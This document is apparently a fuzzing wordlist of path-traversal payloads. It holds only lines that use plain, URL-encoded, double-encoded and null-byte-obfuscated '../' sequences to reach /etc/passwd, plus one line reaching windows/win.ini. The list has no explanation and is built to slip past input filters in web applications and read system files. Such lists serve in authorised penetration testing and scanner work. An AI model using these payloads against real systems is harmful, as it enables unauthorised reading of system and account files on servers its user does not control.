../../../../../../../../../../../../etc/passwd
file=../../../../../../../../../../../../etc/passwd
..././..././..././..././etc/passwd
.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./e%00tc/pa%00sswd
.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./wi%00ndows/wi%00n.ini
..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%2fpasswd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc%2fpasswd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/e%00tc%2fpass%00wd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc%2fpasswd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%2fpasswd